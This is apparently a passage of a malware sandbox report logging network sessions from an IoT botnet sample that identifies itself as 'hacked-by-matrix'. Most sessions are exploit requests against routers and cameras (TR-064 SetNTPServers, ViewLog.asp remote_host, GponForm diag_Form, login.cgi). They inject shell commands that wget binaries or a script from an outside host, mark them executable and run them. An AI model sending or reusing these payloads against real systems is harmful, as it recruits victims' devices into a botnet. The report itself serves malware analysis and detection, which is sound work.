                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>404 - Not Found</title> </head> <body> <h1>404 - Not Found</h1> </body></html>
                                                        Mar 21, 2024 05:23:13.338716030 CET497INHTTP/1.0 400 Bad Request
                                                        Content-Type: text/html
                                                        Content-Length: 349
                                                        Connection: close
                                                        Date: Mon, 02 Feb 1970 17:11:13 GMT
                                                        Server: lighttpd
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 - Bad Request</title> </head> <body> <h1>400 - Bad Request</h1> </body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1070192.168.2.1349882175.213.252.2437547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:13.232808113 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1071192.168.2.1339800212.71.239.18380
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:13.307374001 CET240OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:23:13.464694977 CET500INHTTP/1.1 400 Bad Request
                                                        Date: Thu, 21 Mar 2024 04:23:13 GMT
                                                        Server: Apache/2.4.52 (Ubuntu)
                                                        Content-Length: 306
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 64 6a 61 6d 75 67 72 6f 75 70 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.52 (Ubuntu) Server at djamugroup.com Port 80</address></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1072192.168.2.1356860141.219.174.24280
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:13.328236103 CET6OUTData Raw: 47 45 54
                                                        Data Ascii: GET
                                                        Mar 21, 2024 05:23:16.396270037 CET6OUTData Raw: 47 45 54
                                                        Data Ascii: GET
                                                        Mar 21, 2024 05:23:22.540261030 CET6OUTData Raw: 47 45 54
                                                        Data Ascii: GET
                                                        Mar 21, 2024 05:23:34.572243929 CET6OUTData Raw: 47 45 54
                                                        Data Ascii: GET


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1073192.168.2.1349940175.213.252.2437547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:13.520335913 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1074192.168.2.135401647.149.12.2317547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:13.683731079 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:14.191324949 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1075192.168.2.1351236213.191.117.7480
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:14.664977074 CET435OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save
                                                        Mar 21, 2024 05:23:15.628237963 CET435OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save
                                                        Mar 21, 2024 05:23:15.814364910 CET1235INHTTP/1.1 401 Unauthorized
                                                        Date: Thu, 21 Mar 2024 04:23:15 GMT
                                                        Server: Apache/2.4.38 (Debian)
                                                        WWW-Authenticate: Basic realm="Zdanice - kamery"
                                                        Content-Length: 456
                                                        Keep-Alive: timeout=5, max=100
                                                        Connection: Keep-Alive
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 31 20 55 6e 61 75 74 68 6f 72 69 7a 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 55 6e 61 75 74 68 6f 72 69 7a 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 76 65 72 69 66 79 20 74 68 61 74 20 79 6f 75 0a 61 72 65 20 61 75 74 68 6f 72 69 7a 65 64 20 74 6f 20 61 63 63 65 73 73 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 0a 72 65 71 75 65 73 74 65 64 2e 20 20 45 69 74 68 65 72 20 79 6f 75 20 73 75 70 70 6c 69 65 64 20 74 68 65 20 77 72 6f 6e 67 0a 63 72 65 64 65 6e 74 69 61 6c 73 20 28 65 2e 67 2e 2c 20 62 61 64 20 70 61 73 73 77 6f 72 64 29 2c 20 6f 72 20 79 6f 75 72 0a 62 72 6f 77 73 65 72 20 64 6f 65 73 6e 27 74 20 75 6e 64 65 72 73 74 61 6e 64 20 68 6f 77 20 74 6f 20 73 75 70 70 6c 79 0a 74 68 65 20 63 72 65 64 65 6e 74 69 61 6c 73 20 72 65 71 75 69 72 65 64 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 30 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 48 54 54 50 2f 31 2e 31 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 32 31 20 4d 61 72 20 32 30 32 34 20 30 34 3a 32 33 3a 31 35 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 44 65 62 69 61 6e 29 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 33 31 35 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 6b 61 6d 65 72 79 2e 7a 64 61 6e 69 63 65 2e 62 75 6c 64 61 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>401 Unauthorized</title></head><body><h1>Unauthorized</h1><p>This server could not verify that youare authorized to access the documentrequested. Either you supplied the wrongcredentials (e.g., bad password), or yourbrowser doesn't understand how to supplythe credentials required.</p><hr><address>Apache/2.4.38 (Debian) Server at 127.0.0.1 Port 80</address></body></html>HTTP/1.1 400 Bad RequestDate: Thu, 21 Mar 2024 04:23:15 GMTServer: Apache/2.4.38 (Debian)Content-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.38 (Debian) Server at kamery.zdanice.buldanet Port 80</address></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1076192.168.2.1356014213.6.15.15480
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:14.689872980 CET435OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save
                                                        Mar 21, 2024 05:23:15.366394043 CET435OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save
                                                        Mar 21, 2024 05:23:15.578485966 CET365INHTTP/1.1 301 Moved Permanently
                                                        X-Frame-Options: SAMEORIGIN
                                                        Content-Security-Policy: frame-ancestors 'self'
                                                        X-XSS-Protection: 1; mode=block
                                                        Strict-Transport-Security: max-age=0
                                                        location: https://127.0.0.1:444/cgi-bin/ViewLog.asp
                                                        Date: Thu, 21 Mar 2024 04:23:15 GMT
                                                        Connection: keep-alive
                                                        Keep-Alive: timeout=5
                                                        Transfer-Encoding: chunked
                                                        Data Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1077192.168.2.1350870109.217.206.166443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:14.700789928 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1078192.168.2.13583645.52.17.216443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:14.700803041 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1079192.168.2.13488645.69.50.87443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:14.700820923 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1080192.168.2.1336750118.241.54.232443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:14.700829029 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
